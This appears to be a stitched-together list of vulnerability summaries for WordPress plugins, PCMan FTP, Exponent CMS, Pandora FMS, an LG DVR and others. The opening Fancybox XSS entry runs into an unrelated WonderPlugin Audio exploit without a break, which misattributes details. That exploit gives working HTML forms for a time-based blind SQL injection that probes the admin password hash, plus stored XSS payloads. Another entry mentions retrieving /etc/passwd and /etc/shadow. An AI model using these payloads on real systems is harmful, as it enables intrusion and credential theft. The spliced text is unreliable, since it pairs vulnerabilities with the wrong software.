A stored cross-site scripting (XSS) vulnerability exists in the Fancybox-for-WordPress plugin version 3.0.2 for WordPress. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application, which will be executed in the browser of the victim when the vulnerable page is accessed. This can be exploited by sending a specially crafted POST request to the vulnerable page with malicious JavaScript code in the 'mfbfw[padding]' parameter.
wp_ajax_save_item() is accessible to every registered user (admin privileges are not checked). save_item() uses is_id_exist(), in which $id is not escaped properly. Log in as a standard user (created using wp-login.php?action=register), then:

    <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
      <input type="text" name="item[id]" value="1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)">
      <input type="submit" value="Hack!">
    </form>

This SQL checks whether the first character of the password hash of the user with ID=1 is "$". If so, the query sleeps for 5 seconds. For XSS use:

    <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item">
      <input type="hidden" name="item[id]" value="1">
      <input type="text" name="item[name]" value='<script>alert(String.fromCharCode(88,83,83));</script>'>
      <input type="text" name="item[customcss]" value='</style><script>alert(String.fromCharCode(88,83,83));</script>'>
      <input type="submit" value="Hack!">
    </form>

The injected script is rendered on every page where the wonderplugin_audio shortcode is used, and also in the admin panel: http://wordpress-url/wp-admin/admin.php?page=wonderplugin_audio_show_items

Reference: http://security.szurek.pl/wonderplugin-audio-player-20-blind-sql-injection-and-xss.html
PCMan FTP Server v2.0.7 is vulnerable to a buffer overflow when handling MKD commands. An attacker can send a specially crafted MKD command with an overly long argument, which overflows the buffer and allows the attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused by a lack of proper bounds checking when handling MKD commands.
The Realtek 11n Wireless LAN utility is deployed with Realtek-based Alfa cards and others to help diagnose and view wireless card properties. An unquoted service path privilege escalation allows a user to gain SYSTEM privileges.
Exponent CMS is a free, open source, open standards modular enterprise software framework and content management system (CMS) written in PHP. Universal XSS - Exponent CMS builds the canonical path field from an unsanitized URL, which can be used to execute arbitrary scripts. XSS in user profiles - the "First Name" and "Last Name" fields on http://server/exponent/users/edituser are not sufficiently sanitized. Enter your favourite script and the application will execute it every time for you.
WordPress Video Gallery 2.7 suffers from a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the target server. This request contains a maliciously crafted 'vid' parameter in the 'wp-admin/admin-ajax.php?action=rss&type=video' URL. This can allow an attacker to execute arbitrary SQL commands on the underlying database.
During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser.
Pandora FMS version 5.1 SP1 is vulnerable to SQL injection. The vulnerability exists in the "index.php" page when processing the "login" parameter. A remote attacker can send a specially crafted request to the vulnerable page and execute arbitrary SQL commands in the application's database.
The WordPress Survey and Poll plugin is vulnerable to Blind SQL Injection due to the lack of sanitization of the 'survey_id' variable in the ajax_survey() function in the settings.php file. This allows an attacker to inject malicious SQL code into the application and execute it on the underlying database.
The LG DVR application is prone to a remote file disclosure vulnerability. No authentication (login) is required to exploit this vulnerability. An attacker can exploit it to retrieve files stored on the server, such as '/etc/passwd' and '/etc/shadow', using a simple URL request made from a browser. Moreover, an attacker may be able to compromise encrypted login credentials or retrieve the device's administrator password, allowing them to directly access the device's configuration control panel.